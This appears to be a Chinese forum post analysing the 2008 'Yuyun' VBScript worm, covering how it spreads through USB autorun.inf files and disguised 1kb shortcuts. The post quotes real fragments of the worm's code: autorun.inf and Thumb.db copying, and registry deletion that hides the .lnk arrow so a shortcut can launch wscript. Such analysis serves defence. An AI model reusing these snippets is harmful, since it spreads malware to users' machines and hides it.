之前本人在本吧发布了与病毒的专杀，现在本人就给各位吧友讲解一下啦～

先把病毒源码和专杀地址发上来

先讲一下这个病毒的效果和原理吧
这个病毒会不断传播自己，并且把一段提前写好的话写到［Baca Aq.rtf］和［My Name is Yuyun.rtf］中
这个病毒的传播方式是U盘和共享文件夹传播，主要就是通过AutoRun.inf和1kb快捷方式传播自己
这个病毒除了不断传播自己和谐一段莫名其妙的话以外就没有什么其他骚操作了。。。

现在我们来分析一下病毒的源代码：

'=======================================================
' My name : Yuyun Ver 1.0
' I just wanna see every girl looks nice, better, kinds especially a moslem girl
' by: Anonymouse in Jatim, November 2008
' When I found nothing beauty else... and then I wrote this script for all
'=======================================================
这几行只是作者写的几句话，并没有什么卵用。。。
百度翻译一下，就是：
'（=）（=）（=）（=）（=）
我的名字：玉云1.0版
“我只想看到每个女孩看起来都很漂亮，更好，特别是一个穆斯林女孩。”
'by:2008年11月，在贾蒂姆的Anonymouse
“当我没有发现其他美的时候……然后我为所有人写了这个剧本
'（=）（=）（=）（=）（=）
对于百度的翻译我已经五体投地。。。

首先作者对程序的主体代码和每一个函数都写上了On Error Resume Next语句，防止报错。。。
隐藏自己。。。

然后这里有几个函数：
1 Sub rekursif(path, dp)
2 Sub dropf(path)
3 Sub shorZvnita(path, trgt)
4 Function attack_net()
5 Sub tdr()
6 Function UNISKA()
7 Sub regQ()
8 Sub Hertz(ooo)
这几个函数功能如下：
123实现了U盘自动传播
34实现了共享文件夹传播
5通过错误检查检测运行环境
6写自己的一大堆话到rtf里面
7操作注册表实现桌面顽固图标和开机自启
8综合操作，调用了一下前面的几个函数

上面只是宏观的概括了一下该病毒的功能，其具体的行为有以下几个：
1、写AutoRun.inf
先把内容写到Auto.exe里，再复制到AutoRun.inf
代码如下：
g1 = path + "\autorun.inf"
If fso.FileExists(g1) Then
Set g11 = fso.getfile(g1)
If g11.Attributes <> 39 Then
g11.Attributes = 0
auto.Copy path + "\autorun.inf", True
End If
Else
auto.Copy path + "\autorun.inf", True
End If
If fso.FileExists(g2) Then
Set g12 = fso.getfile(g2)
If g12.Attributes <> 39 Then
g12.Attributes = 0
AQ.Copy path + "\Thumb.db", True
End If
Else
AQ.Copy path + "\Thumb.db", True
End If

5、根据文件夹名创建快捷方式
就是所谓的1kb快捷方式。。。
在病毒作者的设想当中，通过去除.lnk文件的IsShortCut注册表项，快捷方式看起来和正常文件夹一样，不过他显然没有想到到了Win7中没有UAC神马注册表基本都动不了。。。
相关代码如下：
ws.regdelete "HKCR\lnkfile\IsShortcut"
Set shor = ws.CreateShortcut(path + ".lnk")
shor.iconlocation = "shell32.dll,3"
shor.targetpath = "wscript.exe"
shor.arguments = "//e:VBScript thumb.db """ + trgt + """"
shor.save

大概就是这样了。。。
百度秒和谐。。。

有关百度和写的地址：大家可以在我的用说网盘上下载到相关文件，在程序发布文件夹里

专杀原理以后继续写，现在先太监一会。。。

好帖没人顶